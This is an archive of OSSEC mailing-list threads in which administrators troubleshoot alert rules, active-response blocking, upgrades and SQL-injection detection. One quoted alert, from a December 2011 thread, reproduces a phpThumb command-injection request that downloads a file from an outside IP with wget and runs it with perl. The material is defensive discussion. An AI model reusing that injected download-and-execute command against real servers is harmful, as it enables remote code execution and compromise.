Re: [ossec-list] I'd like to ignore these...

2014-08-25 Thread Steven Stern

Thanks very much!

On 08/23/2014 06:29 AM, Binet, Valere (NIH/NIA/IRP) [C] wrote:
> write a local rule in /var/ossec/rules/local_rules.xml
> 
> Your rule should look more or less like this
>   
> 1002
> AH01797
>Ignore AH01797 messages
>   
> 
> replace 11 with the next available ID if 11 is already used by 
> another rule.
> 
> Hoping this helps.
> 
> Valere
> ________
> From: Steven Stern [subscribed-li...@sterndata.com]
> Sent: Friday, August 22, 2014 6:21 PM
> To: ossec-list@googlegroups.com
> Subject: [ossec-list] I'd like to ignore these...
> 
> What's the best way to get OSSEC to ignore this particular "error" in
> error_log? It's the result of .htaccess rules operating correctly, so I
> don't really need to get emails about it.
> 
> I suspect that I need to tell it to not notify me on a rule 1002 if
> "AH01797" is in the text, but I'm not sure how to do that.
> 
> OSSEC HIDS Notification.
> 2014 Aug 22 17:14:00
> 
> Received From:
> cumberland->/var/log/httpd/mywordpress.sterndata.com-error_log
> Rule: 1002 fired (level 2) -> "Unknown problem somewhere in the system."
> Portion of the log(s):
> 
> [Fri Aug 22 17:14:00.115147 2014] [access_compat:error] [pid 16549]
> [client 93.120.14.206:55202] AH01797: client denied by server
> configuration: /var/www/mywordpress/wordpress/xmlrpc.php
> 
> --
> -- Steve
> 


-- 
-- Steve

-- 

--- 
You received this message because you are subscribed to the Google Groups 
"ossec-list" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to ossec-list+unsubscr...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.
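The rule Valere outlines, written out with its tags as an added example (not the rule posted in the thread); the rule id 100001 is an assumption, any unused id from the user-defined range works. The second, commented-out variant keeps the denial in alerts.log and suppresses only the email, so repeated probing of xmlrpc.php stays reviewable later:

```xml
<!-- /var/ossec/rules/local_rules.xml: added example, not the thread's own rule.
     Rule id 100001 is an assumption; OSSEC reserves ids from 100000 upward for
     user-defined rules, and no two rules may share an id. -->
<group name="local,apache,">

  <!-- Child of rule 1002 ("Unknown problem somewhere in the system").
       Level 0 means the event is neither written to alerts.log nor mailed
       once the Apache line contains the AH01797 token (client denied by
       server configuration). <match> is a plain substring test, so no
       escaping is needed. -->
  <rule id="100001" level="0">
    <if_sid>1002</if_sid>
    <match>AH01797</match>
    <description>Ignore AH01797 messages (access denied by .htaccess rules)</description>
  </rule>

</group>

<!-- Alternative if you would rather keep a record of who is being denied:
     same parent and match, but leave the level at 2 and stop only the email.
     The event still lands in alerts.log. Use one of the two rules under
     rule 1002, not both. -->
<!--
<group name="local,apache,">
  <rule id="100001" level="2">
    <if_sid>1002</if_sid>
    <match>AH01797</match>
    <options>no_email_alert</options>
    <description>AH01797: access denied by .htaccess; logged, not mailed</description>
  </rule>
</group>
-->
```

Run /var/ossec/bin/ossec-logtest and paste the AH01797 line from the alert to confirm the new rule, not 1002, is the one that fires before restarting OSSEC.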


[ossec-list] I'd like to ignore these...

2014-08-23 Thread Steven Stern
What's the best way to get OSSEC to ignore this particular "error" in
error_log? It's the result of .htaccess rules operating correctly, so I
don't really need to get emails about it.

I suspect that I need to tell it to not notify me on a rule 1002 if
"AH01797" is in the text, but I'm not sure how to do that.

OSSEC HIDS Notification.
2014 Aug 22 17:14:00

Received From:
cumberland->/var/log/httpd/mywordpress.sterndata.com-error_log
Rule: 1002 fired (level 2) -> "Unknown problem somewhere in the system."
Portion of the log(s):

[Fri Aug 22 17:14:00.115147 2014] [access_compat:error] [pid 16549]
[client 93.120.14.206:55202] AH01797: client denied by server
configuration: /var/www/mywordpress/wordpress/xmlrpc.php

-- 
-- Steve



Re: [ossec-list] Integrity checksum changed for: '/usr/bin/from'

2014-06-04 Thread Steven Stern
Check your package updater's logs.

On 06/04/2014 07:51 AM, dan (ddp) wrote:
> On Wed, Jun 4, 2014 at 4:53 AM, PAL 18  wrote:
>> I just got this a few minutes ago and I wasn't logged into the box. Should I
>> be worried?  Has my server been hacked?
>>
> 
> You have to investigate the change. There's no way for us to know.
> 
>> Rule: 550 fired (level 7) -> "Integrity checksum changed."
>> Portion of the log(s):
>>
>> Integrity checksum changed for: '/usr/bin/from'
>> Old md5sum was: '24dc25d90a3eca83ee42f2532f33e174'
>> New md5sum is : 'efbb9617688bb07ba38119d74d1b27da'
>> Old sha1sum was: '2908c6d4b2e09eeea85f549cfab4c7e68d7aed1c'
>> New sha1sum is : 'bad868d8da99eb14296553899feb44c35c8af47a'
>>


-- 
-- Steve



[ossec-list] 1 zombie process after starting 2.8

2014-06-04 Thread Steven Stern
# ps -ef |grep ossec
ossecm   17982 1  0 11:55 ?00:00:00 /var/ossec/bin/ossec-maild
root 17984 1  0 11:55 ?00:00:00 /var/ossec/bin/ossec-execd
ossec17990 1  0 11:55 ?00:00:00
/var/ossec/bin/ossec-analysisd
root 17994 1  0 11:55 ?00:00:00
/var/ossec/bin/ossec-logcollector
root 17998 1  0 11:55 ?00:00:00
/var/ossec/bin/ossec-syscheckd
ossec18001 1  0 11:55 ?00:00:00
/var/ossec/bin/ossec-monitord
ossecm   18012 17982  0 11:55 ?00:00:00 [ossec-maild] 


-- 
-- Steve



[ossec-list] Won't start after upgrade from 2.7.1 to 2.8

2014-06-04 Thread Steven Stern
At the end of ./install.sh

OSSEC HIDS v2.7.1 Stopped
Starting OSSEC HIDS v2.8 (by Trend Micro Inc.)...
ossec-analysisd: Configuration error. Exiting.

 - Configuration finished properly.

service ossec start
Starting OSSEC:[FAILED]

from ossec.log

2014/06/04 11:48:27 ossec-execd(1314): INFO: Shutdown received. Deleting
responses.
2014/06/04 11:48:27 ossec-execd(1225): INFO: SIGNAL Received. Exit
Cleaning...
2014/06/04 11:48:28 ossec-testrule: INFO: Reading local decoder file.
2014/06/04 11:48:28 ossec-analysisd: Invalid decoder name: 'bro-ids'.
2014/06/04 11:48:28 ossec-testrule(1220): ERROR: Error loading the
rules: 'bro-ids_rules.xml'.
2014/06/04 11:49:32 ossec-testrule: INFO: Reading local decoder file.
2014/06/04 11:49:32 ossec-analysisd: Invalid decoder name: 'bro-ids'.
2014/06/04 11:49:32 ossec-testrule(1220): ERROR: Error loading the
rules: 'bro-ids_rules.xml'.

Contents of ossec-init.conf:

DIRECTORY="/var/ossec"
VERSION="v2.8"
DATE="Wed Jun  4 11:48:28 CDT 2014"
TYPE="local"

Per another email message, deleting the line in
/var/ossec/etc/ossec.conf that includes the bro-ids.xml file fixed things.


-- 
-- Steve



[ossec-list] Reporting network changes

2014-05-15 Thread Steven Stern
I'm getting network change notifications a couple of times per day on
one system. It appears it's comparing the current state to some base
state where most of the services weren't started. I can't find anything
in the logs to indicate that services are being restarted during the
day, so this is a mystery to me.

I tried restarting OSSEC after everything is rolling along, thinking
that might reset the "base state" used for comparison but that doesn't
seem to help.

Received From: mooch->netstat -tan |grep LISTEN |grep -v 127.0.0.1 | sort
Rule: 533 fired (level 7) -> "Listened ports status (netstat) changed
(new port opened or closed)."
Portion of the log(s):

ossec: output: 'netstat -tan |grep LISTEN |grep -v 127.0.0.1 | sort':
tcp0  0 0.0.0.0:111 0.0.0.0:*
LISTEN
tcp0  0 0.0.0.0:139 0.0.0.0:*
LISTEN
tcp0  0 0.0.0.0:17500   0.0.0.0:*
LISTEN
tcp0  0 0.0.0.0:22  0.0.0.0:*
LISTEN
tcp0  0 0.0.0.0:25  0.0.0.0:*
LISTEN
tcp0  0 0.0.0.0:33060.0.0.0:*
LISTEN
tcp0  0 0.0.0.0:445 0.0.0.0:*
LISTEN
tcp0  0 0.0.0.0:53991   0.0.0.0:*
LISTEN
tcp0  0 ::1:631 :::*
LISTEN
tcp0  0 :::111  :::*
LISTEN
tcp0  0 :::139  :::*
LISTEN
tcp0  0 :::22   :::*
LISTEN
tcp0  0 :::443  :::*
LISTEN
tcp0  0 :::445
Previous output:
ossec: output: 'netstat -tan |grep LISTEN |grep -v 127.0.0.1 | sort':
tcp0  0 0.0.0.0:111 0.0.0.0:*
LISTEN
tcp0  0 0.0.0.0:139 0.0.0.0:*
LISTEN
tcp0  0 0.0.0.0:17500   0.0.0.0:*
LISTEN

-- 
-- Steve



[ossec-list] keepalive message

2012-04-08 Thread Steven Stern
This just arrived as an alert:

OSSEC HIDS Notification.
2012 Apr 08 10:40:50

Received From: breadboard->ossec-keepalive
Rule: 1002 fired (level 2) -> "Unknown problem somewhere in the system."
Portion of the log(s):

--MARK--:
OVb32WA]wUjCqjo.b.X0iIeAuuD^c[)RQ_omKOioQ5Q6w4mxk9=6Z]OB4*k6#.r!z)-9CMFAm-bIcn60Ef^LPx#nj=)DCfh2;L)8;tdeXS[h5iqRo?,3w8&)h3q;q@UXr+zji&1nCV9P4'aA;K.21vQ8Go0X[2ola]8WuD!W;]ge_UEu?^E0S_&'R'/Ld0edd#0xXEC.z-c1K_DJm7RmeCTVvROyZaC3u,I*%!%V0y4T1b,v8,Huy]^b[@$c@Xn?bVy^Ah(I)Q],RGr8Ch,iQuX;?E[t,hsLlR9'gVBHU@Efldv]Y6RW[i.H[=0EN)&g(T?GiA$2TZqml'h9Zg%To@]jkVNf-xl8yki+'E?M.pZiXoAqvWs=B1aL4,RV72@avC+o6_ilSp8XEQ$hg?/HiNA$JzCYKVY5=]BfyJ5yhH+L=2aLk/A6'0NCIx]()b?sLA#9rLby(ErrOrkY4K$XSuI[S*#)(@f@T*O@!.ReB99&I)-gx3m&GU!;)?tns#'#YHR&)Q+2tYM2M*qr,CbCEu8r7JF'qy5wn4gap]3IUXSO-95)Tp3;=_jYx,RNu5r-Dy-atb=vhJr.0=yoUKUL#3Rd0Q?Cp4sT,Xb4g;Hn&ZZK



 --END OF NOTIFICATION


According to
http://groups.google.com/group/ossec-list/browse_thread/thread/744de4966f3824c5?pli=1,
this was a bug that's been fixed.  Is it anything to worry about?  I'm
using OSSEC 2.6 on CentOS 5
-- 
-- Steve


Re: [ossec-list] Re: Repeated-offenders still not working

2012-03-12 Thread Steven Stern
On 03/12/2012 11:53 AM, Dimitri Yioulos wrote:
> On Monday 12 March 2012 12:24:47 pm Steven Stern wrote:
>> On 03/12/2012 10:49 AM, Dimitri Yioulos wrote:
>>> Anyone have any ideas on this?
>>>
>>>> All,
>>>>
>>>> Back at the end of last year, I asked about using the repeated-offenders
>>>> feature
>>>> in OH.  I added the following directives to ossec.conf on the host that
>>>> I want this to work in:
>>>>
>>>>   
>>>> host-deny
>>>> host-deny.sh
>>>> srcip
>>>> yes
>>>>   
>>>>
>>>>   
>>>> 
>>>> host-deny
>>>> local
>>>> 6
>>>> 600
>>>>   
>>>>
>>>> Despite that, it's not working.  Ossec reports the following:
>>>>
>>>> OSSEC HIDS Notification.
>>>> 2012 Mar 07 09:08:16
>>>>
>>>> Received From: (plymouth) 192.168.1.2->/var/log/messages
>>>> Rule: 40111 fired (level 10) -> "Multiple authentication failures."
>>>> Portion of the log(s):
>>>>
>>>> Mar  7 09:07:44 plymouth ipop3d[29926]: Login failed user=hod auth=hod
>>>> host=201-93-132-240.dsl.telesp.net.br [201.93.132.240]
>>>> ...
>>>>
>>>> However, rather than OH invoking repeated-offenders, and blocking the
>>>> offender for 600 seconds, I continue to see the offender make attempts
>>>> on the host.
>>>>
>>>> What am I missing here?
>>
>> Can you get onto the server when the block should be in effect?
>>
>> If so, what do you see in /etc/hosts.deny and from "iptables -L"?
>>
>> At the time the blocks should be taking place, do you see anything in
>> /var/log/messages or /var/ossec/logs/active-responses.log?
>>
>> Are you running SELinux in enforcing mode?
>>
>>
>> --
>> -- Steve
> 
> 
> Steve,
> 
> Thanks for your response.  By grepping for the offending IP addy 
> in /var/ossec/logs/active-responses.log, I saw that "host-deny.sh add" 
> and "firewall-drop.sh  add" were fired.  Ten minutes later, host-deny.sh 
> delete" and "firewall-drop.sh  delete" were fired.  So, it appears that 
> repeated-offenders is working.  I just didn't know where to look.  I guess 
> I'd 
> like an email notification when the blocks/unblocks are fired.  How/where do 
> I 
> enable that?

I think this is what you want.  By the way, if you're playing with rules
that lock people out, be sure to whitelist your own IP first.

http://itscblog.tamu.edu/ossec-email-alerts-on-active-responses/

http://www.ossec.net/wiki/Know_How:White_list


-- 
-- Steve


Re: [ossec-list] Re: Repeated-offenders still not working

2012-03-12 Thread Steven Stern
On 03/12/2012 10:49 AM, Dimitri Yioulos wrote:
> Anyone have any ideas on this?
> 
> 
>> All,
>>
>> Back at the end of last year, I asked about using the repeated-offenders 
>> feature  
>> in OH.  I added the following directives to ossec.conf on the host that I 
>> want 
>> this to work in:
>>
>>   
>> host-deny
>> host-deny.sh
>> srcip
>> yes
>>   
>>
>>   
>> 
>> host-deny
>> local
>> 6
>> 600
>>   
>>
>> Despite that, it's not working.  Ossec reports the following:
>>
>> OSSEC HIDS Notification.
>> 2012 Mar 07 09:08:16
>>
>> Received From: (plymouth) 192.168.1.2->/var/log/messages
>> Rule: 40111 fired (level 10) -> "Multiple authentication failures."
>> Portion of the log(s):
>>
>> Mar  7 09:07:44 plymouth ipop3d[29926]: Login failed user=hod auth=hod 
>> host=201-93-132-240.dsl.telesp.net.br [201.93.132.240]
>> ...
>>
>> However, rather than OH invoking repeated-offenders, and blocking the 
>> offender 
>> for 600 seconds, I continue to see the offender make attempts on the host.
>>
>> What am I missing here?


Can you get onto the server when the block should be in effect?

If so, what do you see in /etc/hosts.deny and from "iptables -L"?

At the time the blocks should be taking place, do you see anything in
/var/log/messages or /var/ossec/logs/active-responses.log?

Are you running SELinux in enforcing mode?


-- 
-- Steve


Re: [ossec-list] ossec newbie, increasing tresshold for failed http login and unblock blocked ip

2012-02-05 Thread Steven Stern
On 02/05/2012 11:56 AM, lucas kauffman wrote:
> 
> Also if an IP is blocked, how can I unblock it through ossec ? Or do I
> have to do it manually and delete the entries for hosts.deny and iptables ? 

OSSEC will unblock automatically, based on the timeout parameter in
ossec.conf or your local rules.


  

host-deny
local
6
600
  

  

firewall-drop
local
6
600
  




-- 
-- Steve


Re: [ossec-list] Web Server Trouble

2012-01-25 Thread Steven Stern
I get a lot of 404 alerts, and I let OSSEC block access when it's
multiples from the same IP. Typically, they're looking for phpmyadmin or
other common (and probably poorly secured tools) in a number of locations.

On 01/24/2012 11:33 PM, Damien Hull wrote:
> It looks like someone was requesting thee favicon and the server
> replied with "404"... How does that equal a level 10 alert? Anyway,
> here's the log info.
> 
> GET /theme/image.php?theme=moodlebook&image=favicon&rev=282&component=theme
> HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT
> 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET
> CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; IPH
> 1.1.21.4019)"
> 
> On Tue, Jan 24, 2012 at 10:32 AM, Jason 'XenoPhage' Frisvold
>  wrote:
>> On Jan 24, 2012, at 8:37 AM, Joe Gedeon wrote:
>>> You should look at your logs and see what is triggering the 400's and
>>> fix that issue if it is a server side issue.
>>
>> Agreed.  Basically, the web browser is trying to obtain something from the 
>> server that's just not there.  Thus, 400 errors are triggered.  As a result, 
>> OSSEC sees a bunch of these fly by and considers it an attack.  It's far 
>> better to fix the underlying problem than to alter OSSEC to ignore such 
>> things.
>>


-- 
-- Steve


Re: [ossec-list] perhaps a dump question but need to ask...

2011-12-27 Thread Steven Stern
Be sure to whitelist your own IP address!

On 12/27/2011 09:57 AM, Peter Skurczak wrote:
> Hello there, 
> 
> I was having similar problem. I wanted to find the way how to block an
> ip permanently. 
> I ended up with increasing the "ban time" for not 600 but 60
> seconds and I think that is enough right?
> 
> I also think that if you changed this option
> yes
> to "no" then the ip address will be banned forever, but haven't tried
> this option yet.
> 
> Peter
> 
> 
> On Tue, Dec 27, 2011 at 3:02 PM, jeff wrote:
> 
> From time to time I get these bozo's trying to hack the site.
> 
> If there any way to take any level 9's and level 10's offenders IP
> addresses and add their IP addresses to a blocked list automatically.
> 
> Thanks in advance.
> 
> 
> OSSEC HIDS Notification.
> 
> 2011 Dec 26 10:40:46
> 
> Received From: (mysite-on-12)
> 65.36.247.12->/usr/local/apache1.3/logs/
> surveyreports_access_12262011.log
> 
> Rule: 31153 fired (level 10) -> "Multiple common web attacks from same
> souce
> ip."
> 
> Portion of the log(s):
> 
> 94.23.24.185 - - [26/Dec/2011:12:09:27 -0500] "GET
> /wp-content/themes/Comfy/scripts/phpThumb/phpThumb.php?
> src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line
> %20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f
> %2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;
> %20&phpThumbDebug=9
> HTTP/1.1" 404 346 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0)
> Gecko/20100101 Firefox/8.0"
> 
> 



-- 
-- Steve


[ossec-list] Trojan false positive and portreserve

2011-12-27 Thread Steven Stern
I just disabled cups on my server (no printer, no need to print) and
OSSEC reported

Port '631'(tcp) hidden. Kernel-level rootkit or trojaned version of netstat

A quick check of netstat shows

$ sudo netstat -anp |grep 631
udp0  0 0.0.0.0:631 0.0.0.0:*
1125/portreserve

And Googling tells me that portreserve is there to make sure that if I
were to start cups later, the necessary port would be available.

Should OSSEC be modified to be aware of ports held by portreserve?

System is CentOS 6.2.

-- 
-- Steve


Re: [ossec-list] disable-account

2011-09-19 Thread Steven Stern
Disabling root seems like a nice path to a DoS.  You'd probably do
better to use a rule to block the offending IP rather than killing
root's account.  (Hint from hard personal experience: Exclude your own
IP from the rule.)


On 09/19/2011 10:56 AM, dan (ddp) wrote:
> 
> On Sep 19, 2011 11:53 AM, "Damien Hull" wrote:
>>
>> Here's my configuration for disable-account. It doesn't work. I'm not
> sure I understand how it works. I was hoping a user would get kicked off
> the system after too many failed login attempts. I tried to "su" to root
> and type in the wrong password. I get an email from OSSEC but that's it.
> The user is not kicked off the system. 
>>
>>  
>>disable-account
>>local
>>600
>>  
>>
> 
> It doesn't look like you list when the AR should fire. Certain sid?
> Certain level?
> Also, I'm not sure the user will be kicked off. The account will be
> disabled, but beyond that I'm not sure (I don't use that script).
> 
>> On Sep 18, 2011, at 5:42 PM, "dan (ddp)" wrote:
>>
>>> Why not share your configuration so we can try to help?
>>>
>>> On Sep 18, 2011 9:40 PM, "Damien Hull" wrote:
>>> > I just reinstalled OSSEC and configured "disable-account". No luck. It
>>> > doesn't work.
>>> >
>>> > Are there any instructions for this?
>>> >
>>> > Sent from my iPhone
>>> >
>>> > On Sep 18, 2011, at 2:09 PM, Eero Volotinen wrote:
>>> >
>>> >> 2011/9/19 Damien Hull <dh...@section9.us>:
>>> >>> I just installed OSSEC version 2.6 on ubuntu 10.04. I tried to
>>> >>> configure OSSEC to disable a user account with no luck.
>>> >>>
>>> >>> I tested it by typing the wrong password into "su". I get an
> email but
>>> >>> the account is still active.
>>> >>>
>>> >>> How do I disable user accounts with OSSEC?
>>> >>>
>>> >>
>>> >> is active response enabled?
>>> >>
>>> >> --
>>> >> Eero
> 


-- 
-- Steve


Re: [ossec-list] stupid question on ossec configuration

2011-09-07 Thread Steven Stern
On 09/07/2011 09:10 AM, Eero Volotinen wrote:
> Hi List,
> 
> I want alert to ossec when linux interface (ethernet) link goes down ?
> How to do this?
> 
> --
> Eero

Dumb question in return: If the network is down, how is it going to
notify you?

You probably want one or more external boxes monitoring connectivity and
let them send messages.  Nagios?

-- 
-- Steve


Re: [ossec-list] OSSEC-Keepalive message -- what does this mean?

2011-06-17 Thread Steven Stern
I'm using 2.5.1. There is no separate manager; OSSEC runs on and reports 
from this system.


On 06/17/2011 03:04 PM, dan (ddp) wrote:

Hi Steven,
Those are keepalive messages from an agent to the manager. You can ignore them.
What version of OSSEC do you have installed? They're supposed to be
ignored so they don't fire alerts...

On Fri, Jun 17, 2011 at 3:52 PM, Steven Stern
  wrote:

What does this mean?  Where do I look for an error?



Received From: ip-10-x->ossec-keepalive
Rule: 1002 fired (level 2) ->  "Unknown problem somewhere in the system."
Portion of the log(s):

--MARK--:
ggM6EJz3j+TNLDYHUgwX3-n_2esOyS6Eg0SLR(i1pjiiMpPOvufGY79ut]rR]FEc?-NRqd0GnqOhFMWioj.#y6OS1ndeS+ga#bRKfZy6^vv3pz@DJ8Xp-f7RttetiYtC0s$n*T)1%Wy.-RAzu=OYL4Ym=2F?uhC_zXPlk&#'HSExdne@SaE.4,XVYLdAS)p*KmKc.4JEq%18]5NN5*'(v/+BJ;2]tzv3LnoI(XucF+!%c6!q?3Qv1FeT#6,?Nr3')*^5-ep!HIS;i!WVHgyRLDerROr?oCGb1p6?7D9X@!.BOT=Ehp+aaHsSD=?R7FS&cs^!eT^^xul@$QXCnMC2Bco5'n4iar;c=8u]9d@axEtSC*_.@5ZV7v8j-Gr-Xk'.A1;d5lRK.!Lzd$xxME(o0cx/IO+OgwL_=*=e.-P[1I8mpNJ2*v&'xV;od$kYRdMI_(N*8Ku*(,/PJHl8lJ2-/USQ^2iA5cqc_lBfdV-D?C)-s/ZD-97_@uEcEM&S.aUz0+E3L9b;TC^@A-W4ZyT(a=_((4E^m;i#%];7m'Z5v-Ld#P8)v95v0bW[5[rAB%gj9/yDF=ciw]0cL&E6TRK

--
-- Steve



[ossec-list] OSSEC-Keepalive message -- what does this mean?

2011-06-17 Thread Steven Stern

What does this mean?  Where do I look for an error?



Received From: ip-10-x->ossec-keepalive
Rule: 1002 fired (level 2) -> "Unknown problem somewhere in the system."
Portion of the log(s):

--MARK--: 
ggM6EJz3j+TNLDYHUgwX3-n_2esOyS6Eg0SLR(i1pjiiMpPOvufGY79ut]rR]FEc?-NRqd0GnqOhFMWioj.#y6OS1ndeS+ga#bRKfZy6^vv3pz@DJ8Xp-f7RttetiYtC0s$n*T)1%Wy.-RAzu=OYL4Ym=2F?uhC_zXPlk&#'HSExdne@SaE.4,XVYLdAS)p*KmKc.4JEq%18]5NN5*'(v/+BJ;2]tzv3LnoI(XucF+!%c6!q?3Qv1FeT#6,?Nr3')*^5-ep!HIS;i!WVHgyRLDerROr?oCGb1p6?7D9X@!.BOT=Ehp+aaHsSD=?R7FS&cs^!eT^^xul@$QXCnMC2Bco5'n4iar;c=8u]9d@axEtSC*_.@5ZV7v8j-Gr-Xk'.A1;d5lRK.!Lzd$xxME(o0cx/IO+OgwL_=*=e.-P[1I8mpNJ2*v&'xV;od$kYRdMI_(N*8Ku*(,/PJHl8lJ2-/USQ^2iA5cqc_lBfdV-D?C)-s/ZD-97_@uEcEM&S.aUz0+E3L9b;TC^@A-W4ZyT(a=_((4E^m;i#%];7m'Z5v-Ld#P8)v95v0bW[5[rAB%gj9/yDF=ciw]0cL&E6TRK


--
-- Steve


Re: [ossec-list] stupid (?) rule question

2011-06-05 Thread Steven Stern

On 06/05/2011 07:02 AM, Rainer wrote:

Hi,

I want to block a certain WWW bot called verticalpigeon; it is known
to scan for Joomla! installations. You can also trigger it through the
website manually. But the nice thing is, it says
who it is:

  66.103.61.161 - - [05/Jun/2011:09:44:59 +0200]
"GET /index2.php?option=com_docman HTTP/1.0" 404 1928
"http://verticalpigeon.com/"; "Mozilla/4.0 (compatible; MSIE 8.0; Windows
NT 5.1; http://verticalpigeon.com/)"

So I thought I could block that bot after the first time it accesses
a website by just adding a rule matching the string
"http://verticalpigeon.com/";

The rule I created is: (local_rules.xml)


 http://verticalpigeon.com
 alert_by_email
 joomla scanner
 attacks,


But it just doesn't work.
Apache access_log and error_log is decoded fine.
As far as I understood, I don't need to escape : and / in the rule
above. What did I miss?

thanks.




Even if your rule worked, you're giving this system one shot at your 
site.  It might be better to block it at the apache level.  This info is 
a bit dated, but I think it should still work with current versions of 
Apache:

http://www.evolt.org/article/Using_Apache_to_stop_bad_robots/18/15126/

--
-- Steve


Re: [ossec-list] Timeout value units

2011-03-28 Thread Steven Stern
On 03/28/2011 01:47 PM, dan (ddp) wrote:
> The units are seconds.
> How far apart were the attacks?
> 
> On Sun, Mar 27, 2011 at 12:31 PM, Steven Stern
>  wrote:
>> I just want to confirm: in an active response rule, is the timeout
>> value the number of seconds?
>>
>> I had someone whacking my website today looking for mysql access and the
>> rule triggered three times (on the same IP address) in two minutes.  The
>> first trigger should have locked out his IP for "360" -- my assumption
>> is that is 6 minutes, long enough for the script to time out and move on
>> to someone else.
>>
>>
>> --
>> -- Steve
>>

They were all within two minutes. I've added some logging to the drop
script so I can see exactly when it gets triggered.  In my testing, I
managed to lock myself out of the server for 6 minutes, so I know it
works. 

-- 
-- Steve


[ossec-list] Timeout value units

2011-03-27 Thread Steven Stern
I just want to confirm: in an active response rule, is the timeout
value the number of seconds?

I had someone whacking my website today looking for mysql access and the
rule triggered three times (on the same IP address) in two minutes.  The
first trigger should have locked out his IP for "360" -- my assumption
is that is 6 minutes, long enough for the script to time out and move on
to someone else.


-- 
-- Steve


Re: [ossec-list] OSSEC for Sql injection attack

2011-02-05 Thread Steven Stern
On 02/04/2011 09:46 PM, tanishk lakhaani wrote:
> Yes, the active response works on the basis of this only...When u
> launch a scan, a few attacks will actually pass thru, then only the agent
> will forward the corresponding logs to the OSSEC Server, who will then
> decide whether to use Active Response or not. Once the server decides to
> use active response, all the future attacks from the attacker IP will be
> prevented from being executed. This is how active response works.
>  
> Btw, Steve, can u pls tell me how is the link that u have just
> circulated (the XKCD reference) is helpful to us ?
>  
> Regards
> Tanishk
> 
> On Sat, Feb 5, 2011 at 2:18 AM, Steven Stern
> <subscribed-li...@sterndata.com>
> wrote:
> 
> On 02/04/2011 12:39 PM, tanishk lakhaani wrote:
> > Well, I think that deploying active response can be a good way out to
> > prevent SQL Injection based attacks. However, there may be a few
> issues
> > related to it viz..decoders in ossec are designed to indicate a SQL
> > Injection attack even in case SELECT/UNION or any other SQL Based
> command
> > is used in the Request. This may be a bit of hindrance, as it may be
> > that the legitimate traffic is being blocked.
> >
> > I have already deployed Active Response in testing Environment,
> and post
> > deployment, launched a NESSUS Scan, and to my surprise, Active
> Response
> > turned out to be fantastic to prevent SQL Injection based attacks.
> >
> > Regards
> > Tanishk
> >
> > On Fri, Feb 4, 2011 at 12:12 AM, Steven Stern
> > <subscribed-li...@sterndata.com>
> > wrote:
> >
> > On 02/03/2011 12:00 PM, satish patel wrote:
> > > How efficient OSSEC is to stop SQL injection ? If not then i
> have to
> > > move on mod_security
> > >
> > > Is anybody out there who using ossec for sql injection ?
> > >
> > >
> > > Thanks,
> > > S
> > It's very good at detecting SQL injection, but your code shouldn't
> > () be susceptible to it.  mod_security has its own
> issues with
> > false positives.
> >
> > --
> > -- Steve
> >
> >
> Unfortunately, the first attack line probably gets through.  By the way,
> mandatory XKCD reference: http://xkcd.com/327/
> 
> --
> -- Steve
> 
> 
> 
> 
> -- 
> warm regards
> Tanishk Lakhaani

Exactly. The first injection connection can be bad.  I have run systems
that were found to be vulnerable to SQL injection.  OSSEC detected the
attack, but we were being hit from multiple IPs over a long time at a
low rate. Active response wouldn't have helped.  We were able to use
OSSECs logs (and system logs) to figure out what scripts the attackers
were using. We took our systems off the internet, ran the same scans at
a high rate, and determined which parts of the system had not been
hardened against injection attacks. We then coded in a protection layer.
When we went back on the internet, OSSEC showed that the attacks
continued but without any success.

-- 
-- Steve


Re: [ossec-list] OSSEC for Sql injection attack

2011-02-04 Thread Steven Stern
On 02/04/2011 12:39 PM, tanishk lakhaani wrote:
> Well, I think that deploying active response can be a good way out to
> prevent SQL Injection based attacks. However, there may be a few issues
> related to it viz..decoders in ossec are designed to indicate a SQL
> Injection attack even in case SELECT/UNION or any other SQL Based command
> is used in the Request. This may be a bit of hindrance, as it may be
> that the legitimate traffic is being blocked.
>  
> I have already deployed Active Response in testing Environment, and post
> deployment, launched a NESSUS Scan, and to my surprise, Active Response
> turned out to be fantastic to prevent SQL Injection based attacks.
>  
> Regards
> Tanishk
> 
> On Fri, Feb 4, 2011 at 12:12 AM, Steven Stern
> <subscribed-li...@sterndata.com>
> wrote:
> 
> On 02/03/2011 12:00 PM, satish patel wrote:
> > How efficient OSSEC is to stop SQL injection ? If not then i have to
> > move on mod_security
> >
> > Is anybody out there who using ossec for sql injection ?
> >
> >
> > Thanks,
> > S
> It's very good at detecting SQL injection, but your code shouldn't
> () be susceptible to it.  mod_security has its own issues with
> false positives.
> 
> --
> -- Steve
> 
> 
Unfortunately, the first attack line probably gets through.  By the way,
mandatory XKCD reference: http://xkcd.com/327/

-- 
-- Steve


Re: [ossec-list] OSSEC for Sql injection attack

2011-02-03 Thread Steven Stern
On 02/03/2011 12:00 PM, satish patel wrote:
> How efficient OSSEC is to stop SQL injection ? If not then i have to
> move on mod_security
> 
> Is anybody out there who using ossec for sql injection ?
> 
> 
> Thanks,
> S
It's very good at detecting SQL injection, but your code shouldn't
() be susceptible to it.  mod_security has its own issues with
false positives.

-- 
-- Steve


Re: [ossec-list] Re: Active Response not activating [Solved]

2010-10-31 Thread Steven Stern
On 10/27/2010 01:30 PM, Steven Stern wrote:
> Thanks.  I've changed it and will await the next attack.
> 
> On Wed, Oct 27, 2010 at 1:15 PM, jplee3  wrote:
>> Your section looks OK. There may be issues with the <active-response> portion however. Try this:
>>
>> 
>>  no
>>  firewall-drop
>>  local
>>  31151
>>  8 (I don't think you even need this flag if you
>> *only* want to trigger on the rule id 31151)
>> 
>>
>>
>> Let us know if that works. I think it might be the "disabled" flag
>> that was keeping it back.
>>
>>
>> On Oct 27, 10:44 am, Steven Stern 
>> wrote:
>>> In /var/ossec/etc/osse.conf, I have
>>>
>>> 
>>>   firewall-drop
>>>   firewall-drop.sh
>>>   srcip
>>>   yes
>>> 
>>>
>>> 
>>>   firewall-drop
>>>   local
>>>   31151
>>>   8
>>> 
>>>
>>> My logs show multiple 31151 alerts. For example:
